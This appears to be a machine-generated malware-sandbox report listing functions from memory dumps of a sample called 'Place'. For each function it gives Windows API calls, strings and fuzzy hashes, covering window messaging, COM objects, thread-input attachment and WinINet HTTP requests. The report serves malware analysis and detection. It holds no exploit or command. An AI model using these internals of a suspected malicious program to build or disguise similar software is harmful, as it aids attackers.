Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 5df45053600d4c0e945e4d144113f8353bcd876bdb8e0acaf40a5f86aa3b30ca
Instruction ID: 2c4c6d44da663db93336645a6d661a36f7e227c64b86951469779611c4908a55
Opcode Fuzzy Hash: 5df45053600d4c0e945e4d144113f8353bcd876bdb8e0acaf40a5f86aa3b30ca
Instruction Fuzzy Hash: C4618D702087169FD710DF14C889B7ABBE8BF84714F14485EFA859B291DB74ED48CBA2

Function 0059CF0C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0059CFC2
_memmove.LIBCMT ref: 0059D060
_memset.LIBCMT ref: 0059D084

Strings

internal error: opcode not recognized, xrefs: 0059D097
argument is not a compiled regular expression, xrefs: 005D16B8
internal error: missing capturing bracket, xrefs: 005D16B0
ERCP, xrefs: 0059CF2D
failed to get memory, xrefs: 0059D0A2
argument not compiled in 16 bit mode, xrefs: 005D16A8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
API String ID: 2532777613-264027815
Opcode ID: 8e89426d7908fcb8d05212b01be9446969561041519cfddd4a781016ee67247a
Instruction ID: 884bc4af321939283153bdc1bfc4685d36dabaed4bab070a20b038c265df75e6
Opcode Fuzzy Hash: 8e89426d7908fcb8d05212b01be9446969561041519cfddd4a781016ee67247a
Instruction Fuzzy Hash: 8751B0B190070A9BDB24CF64C9897AABFF5FF44314F24856EE44ADB250E730D585CB90

Function 005EBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005EBB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 005EBB89
GetLastError.KERNEL32 ref: 005EBB93
SetErrorMode.KERNEL32(00000000,READY), ref: 005EBC00

Strings

READONLY, xrefs: 005EBBCB
INVALID, xrefs: 005EBBD2
UNKNOWN, xrefs: 005EBBB8
READY, xrefs: 005EBBD9
NOTREADY, xrefs: 005EBBBF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: af7d816b8fae8c153f147b26b2937bfbbe6b88108f3e33dff26cd02c19a6cb4b
Instruction ID: ef55fe89aa9e18090e3073c2d0e676662ac624adc8b8f2c6bc318b8f68aef173
Opcode Fuzzy Hash: af7d816b8fae8c153f147b26b2937bfbbe6b88108f3e33dff26cd02c19a6cb4b
Instruction Fuzzy Hash: FD31D935A0024E9FEB14DF66C849EAEBFB9FF44301F148056E945E7295DB709D41CB90

Function 005E34DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 005E357C

Strings

stop, xrefs: 005E354D
question, xrefs: 005E3535
,zd0zd, xrefs: 005E358D
info, xrefs: 005E351D
,zd0zd, xrefs: 005E350F
warning, xrefs: 005E3565
blank, xrefs: 005E34FE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconLoad
String ID: ,zd0zd$,zd0zd$blank$info$question$stop$warning
API String ID: 2457776203-4047664515
Opcode ID: a58aa235489e8c1d9762db7d17d8ffff0dc8e6bc7e792e7e811adf4a7270ee66
Instruction ID: 9b98ca050ae74e4ca1f19da1515d33239a943dfbebbb138739537cf98cdadd8d
Opcode Fuzzy Hash: a58aa235489e8c1d9762db7d17d8ffff0dc8e6bc7e792e7e811adf4a7270ee66
Instruction Fuzzy Hash: D611EB71648387BEAB085A55DC9ACAE7FDCFF06364F10142BF64057381E7A46F4055A0

Function 005D9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005D9BCC
GetDlgCtrlID.USER32 ref: 005D9BD7
GetParent.USER32 ref: 005D9BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 005D9BF6
GetDlgCtrlID.USER32(?), ref: 005D9BFF
GetParent.USER32(?), ref: 005D9C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 005D9C1E

Strings

ListBox, xrefs: 005D9B89
ComboBox, xrefs: 005D9B54

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 33667a903fc63ed9410316f12e12ccd4c960dc35393dbfff3d3f2c53929a789c
Instruction ID: 76fd2b79e7189e141838e1355329d7ec33480d4582ac82189f851d1336ffb45c
Opcode Fuzzy Hash: 33667a903fc63ed9410316f12e12ccd4c960dc35393dbfff3d3f2c53929a789c
Instruction Fuzzy Hash: 9421B270900205AFDF14ABA4CC89DFEBFAAFF95310F104117F961932A1DB758855DA60

Function 005D9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005D9CB5
GetDlgCtrlID.USER32 ref: 005D9CC0
GetParent.USER32 ref: 005D9CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 005D9CDF
GetDlgCtrlID.USER32(?), ref: 005D9CE8
GetParent.USER32(?), ref: 005D9D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 005D9D07

Strings

ListBox, xrefs: 005D9C74
ComboBox, xrefs: 005D9C3F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 786821b345c694d6f89c6d3dec845edd2f3718b3a27a0cc60851cb9e0adbf499
Instruction ID: b055c489c08400f20f447a200fe690d6df36eef12cb558a9861a7519ef27e127
Opcode Fuzzy Hash: 786821b345c694d6f89c6d3dec845edd2f3718b3a27a0cc60851cb9e0adbf499
Instruction Fuzzy Hash: EE21F171A00205AFDF10ABA4CC89EFEBBBAFF85300F104017F851932A1DB758855EA60

Function 005D9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005D9D27
GetClassNameW.USER32(00000000,?,00000100), ref: 005D9D3C
_wcscmp.LIBCMT ref: 005D9D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005D9DC9

Strings

SHELLDLL_DefView, xrefs: 005D9D48
smallicons, xrefs: 005D9D91
largeicons, xrefs: 005D9D5D
list, xrefs: 005D9DAB
details, xrefs: 005D9D77

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 86303219cb67fe20357c23a65989a5a12c2bcb710c45518df8e30f3e81150898
Instruction ID: 31066b055250b212094d7659e4d300da74718296307be6b07852164ec353c0d0
Opcode Fuzzy Hash: 86303219cb67fe20357c23a65989a5a12c2bcb710c45518df8e30f3e81150898
Instruction Fuzzy Hash: ED110A76248303B9FB203668EC0ADAA7B9EFB46334F200027F900E41D1FA956A5165D1

Function 005F8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005F8FC1
CoInitialize.OLE32(00000000), ref: 005F8FEE
CoUninitialize.OLE32 ref: 005F8FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 005F90F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 005F9225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00613BDC), ref: 005F9259
CoGetObject.OLE32(?,00000000,00613BDC,?), ref: 005F927C
SetErrorMode.KERNEL32(00000000), ref: 005F928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005F930F
VariantClear.OLEAUT32(?), ref: 005F931F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 40e360ead2c5238f50e8582fdfcd62503278da161c534bb16c3dc24dd9a0b4f0
Instruction ID: d520df0bc5d68c358ff13a1629fbc38428135621615a48c49329af3573aafd7a
Opcode Fuzzy Hash: 40e360ead2c5238f50e8582fdfcd62503278da161c534bb16c3dc24dd9a0b4f0
Instruction Fuzzy Hash: 46C15A71208709AFD700DF54C888A6BBBE9FF89308F00491DFA8A9B251DB75ED45CB52

Function 005E19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005E19EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1A03
GetWindowThreadProcessId.USER32(00000000), ref: 005E1A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 005E1A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005E0A67,?,00000001), ref: 005E1ABB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: a6ce783bc3bd2d5da99e1f98261a7bba3ec71a7df32aba2fa968c26d569b2e5d
Instruction ID: ca3b2c662f52443550d473fc98a8fe9f12c6e3585dad16f3ba5f3484af4ed53c
Opcode Fuzzy Hash: a6ce783bc3bd2d5da99e1f98261a7bba3ec71a7df32aba2fa968c26d569b2e5d
Instruction Fuzzy Hash: 6531FD39201684AFEB148F11DD48FB93BABBB57345F109126F840C7190CBB49C808BA4

Function 005BC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0058260D
SetTextColor.GDI32(?,000000FF), ref: 00582617
SetBkMode.GDI32(?,00000001), ref: 0058262C
GetStockObject.GDI32(00000005), ref: 00582634
GetClientRect.USER32(?), ref: 005BC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 005BC113
GetWindowDC.USER32(?), ref: 005BC11F
GetPixel.GDI32(00000000,?,?), ref: 005BC12E
ReleaseDC.USER32(?,00000000), ref: 005BC140
GetSysColor.USER32(00000005), ref: 005BC15E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: bffd9db6c20ce12bcc678b35b0fcfcf8760bfb71a470381fbbb8eb11efe47382
Instruction ID: 9c4f1a349d29808c1fc033c0cc6b08242a923bcba8e2790dd92dc852b1c6a3d2
Opcode Fuzzy Hash: bffd9db6c20ce12bcc678b35b0fcfcf8760bfb71a470381fbbb8eb11efe47382
Instruction Fuzzy Hash: 6F115931504204BFEF616FB4EC09BE97FA2FB08321F148266FA65A50E1CBB11991EF50

Function 0058AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0058ADE1
OleUninitialize.OLE32(?,00000000), ref: 0058AE80
UnregisterHotKey.USER32(?), ref: 0058AFD7
DestroyWindow.USER32(?), ref: 005C2F64
FreeLibrary.KERNEL32(?), ref: 005C2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005C2FF6

Strings

close all, xrefs: 0058ADDC

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: eb3a6ce3bd7142deb5f9386816e80f7fa6e710bebc5d625604360dad3f2f50b6
Instruction ID: d84ea744971700fa697cb74d4c5d1d4a377d3262e0b3ae00d7360ca1c9cb9202
Opcode Fuzzy Hash: eb3a6ce3bd7142deb5f9386816e80f7fa6e710bebc5d625604360dad3f2f50b6
Instruction Fuzzy Hash: 54A179357012128FDB29EF54C599F69FB64BF44700F1482ADE90AAB251DB30AD52CF91

Function 005DAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,005DB13A), ref: 005DB078

Strings

CLASS, xrefs: 005DADF7
INSTANCE, xrefs: 005DAF86
TEXT, xrefs: 005DAFAF
NAME, xrefs: 005DAEAA
CLASSNN, xrefs: 005DAE1A
REGEXPCLASS, xrefs: 005DAE3D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: ad9b34a813efbb465cf4e3f694f3267cf756ce00f2e13fd38ecb96b8c8573612
Instruction ID: b121a463683e7a4b0b1aac17fa14ab44d401458629e3a176ff1473f0fab3bcad
Opcode Fuzzy Hash: ad9b34a813efbb465cf4e3f694f3267cf756ce00f2e13fd38ecb96b8c8573612
Instruction Fuzzy Hash: F191AE71600607EADB28EFA4C485BEEFFB5BF45300F10811BE85AA3291DF306959DB91

Function 005831F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0058327E

Part of subcall function 0058218F: GetClientRect.USER32(?,?), ref: 005821B8
Part of subcall function 0058218F: GetWindowRect.USER32(?,?), ref: 005821F9
Part of subcall function 0058218F: ScreenToClient.USER32(?,?), ref: 00582221

GetDC.USER32 ref: 005BD073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005BD086
SelectObject.GDI32(00000000,00000000), ref: 005BD094
SelectObject.GDI32(00000000,00000000), ref: 005BD0A9
ReleaseDC.USER32(?,00000000), ref: 005BD0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005BD13C

Strings

U, xrefs: 005BD011

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 792adb742d5faaf048c9d41ab9f5223ba11118bd5f1237d2ae937a28158cc3a0
Instruction ID: 43c3d8e35265370eff9052d0cf3adb029b495444a2a5a7a09f415a3bf5649b8d
Opcode Fuzzy Hash: 792adb742d5faaf048c9d41ab9f5223ba11118bd5f1237d2ae937a28158cc3a0
Instruction Fuzzy Hash: 5D710434404209DFCF21EF64C888AFA7FB6FF49320F144669ED556A1A5E731A941DF60

Function 0060C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

Part of subcall function 00582714: GetCursorPos.USER32(?), ref: 00582727
Part of subcall function 00582714: ScreenToClient.USER32(006477B0,?), ref: 00582744
Part of subcall function 00582714: GetAsyncKeyState.USER32(00000001), ref: 00582769
Part of subcall function 00582714: GetAsyncKeyState.USER32(00000002), ref: 00582777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0060C69C
ImageList_EndDrag.COMCTL32 ref: 0060C6A2
ReleaseCapture.USER32 ref: 0060C6A8
SetWindowTextW.USER32(?,00000000), ref: 0060C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0060C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0060C847

Strings

@GUI_DROPID, xrefs: 0060C799
@GUI_DRAGFILE, xrefs: 0060C7DC

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 7f6f819f6270536fc7956ce2e07703c726254f09634ac0403090ea423c95cf9c
Instruction ID: 024b60b9439670e30df5fb023c48b7d2f66a1440657867964b96f506effc96d7
Opcode Fuzzy Hash: 7f6f819f6270536fc7956ce2e07703c726254f09634ac0403090ea423c95cf9c
Instruction Fuzzy Hash: 5D517B74204205AFDB04EF14CC59FAB7BE6FB84310F008A2DF995972E1DB70A945CB91

Function 006073A5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00607449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0060745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00607477
_wcscat.LIBCMT ref: 006074D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 006074E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00607517

Strings

-----, xrefs: 006074CA
SysListView32, xrefs: 0060741B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: -----$SysListView32
API String ID: 307300125-3975388722
Opcode ID: 1eba4fc29e5f3b6b8c1e81de961ae98ca97f676cab05c545ab3857c41a7eb348
Instruction ID: 82bf157e33cfee60ad960b0ae765aca4713dbb713434fe38ca4fa33ba35eae2f
Opcode Fuzzy Hash: 1eba4fc29e5f3b6b8c1e81de961ae98ca97f676cab05c545ab3857c41a7eb348
Instruction Fuzzy Hash: 8C419070A44308AFEB259F64CC85BEE7BEAEF48350F10442AF945A62D1D671AD848B50

Function 005F20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005F211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005F2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005F218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005F219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005F21DC
InternetCloseHandle.WININET(00000000), ref: 005F2223

